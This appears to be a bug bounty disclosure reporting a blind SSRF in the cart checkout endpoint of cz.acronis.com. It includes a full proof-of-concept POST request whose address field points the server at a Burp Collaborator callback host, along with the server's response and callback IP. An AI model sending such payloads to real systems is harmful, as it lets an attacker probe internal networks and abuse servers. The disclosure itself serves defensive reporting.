Blind SSRF vulnerability on cz.acronis.com

Hello Acronis team. I would like to report a Blind SSRF vulnerability on cz.acronis.com. Affected Url: https://cz.acronis.com/wp-admin/admin-ajax.php Parameter vulnerable: address and company POC: POST Request, payload in address body parameter: ``` POST /wp-admin/admin-ajax.php HTTP/1.1 Host: cz.acronis.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://cz.acronis.com/kosik/?item=7200 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 582 Connection: close Cookie: _ga=GA1.2.1144740602.1610556882; _fbp=fb.1.1610556883161.353705208; leady_session_id=8dd6174f-2994-4c5c-977f-d58ab8931a83; _gid=GA1.2.696910190.1611347375; PHPSESSID=ej1u101q1es5tb127hitsqscp5; has_js=1; language_prefix=sortiment items%5B0%5D%5Bname%5D=Acronis+Disk+Director+12.5+Home+1+PC&items%5B0%5D%5Bprice%5D=1056&items%5B0%5D%5BformattedPrice%5D=1056.00k%C4%8D&totalSurcharge=1056&addItem=undefined&removeItem=undefined&recalculate=undefined&name=Jmone&isCompany=YES&notifier_x-iscompany=NO&undefined=false&deliveryClearKatakana=true&company=&surname=Pifsf&deliveryClearRomanized=true&address=http%3a%2f%2fjczo3ewu8jpfgyiajmkacspsnjtbh0.burpcollaborator.net/ssrf&zip=25458&city=sdfasd&ico=&dic=&email=test%40fgmail.com&phone=%2B420+724+023+780&newsletter=false&notifier_x-newsletter=NO&action=createPayment ``` App Response: ``` HTTP/1.1 200 OK Date: Sun, 24 Jan 2021 22:46:17 GMT Server: Apache/2.4.38 (Debian) Pragma: no-cache X-Robots-Tag: noindex X-Content-Type-Options: nosniff Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Vary: Accept-Encoding Upgrade: h2,h2c Connection: Upgrade, close Referrer-Policy: Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 92 Content-Type: text/html; charset=UTF-8 {"status":"ok","gw_url":"https:\/\/gate.gopay.cz\/gw\/v3\/eec2d2792d0935ea959b71b0762a4559"} ``` Callback HTTP connection from Acronis server 109.123.216.85 (SSRF vulnerability): {F1170498} {F1170497} More information about the execution context, please, send a message. Regards ## Impact Blind SSRF, this vulnerability allows any unauthenticated user/client to make Wordpress send HTTP requests to any URL/address (internal or external). Other attacks can be performed using this vulnerability, such as network amplification attacks to other systems that it can interact with.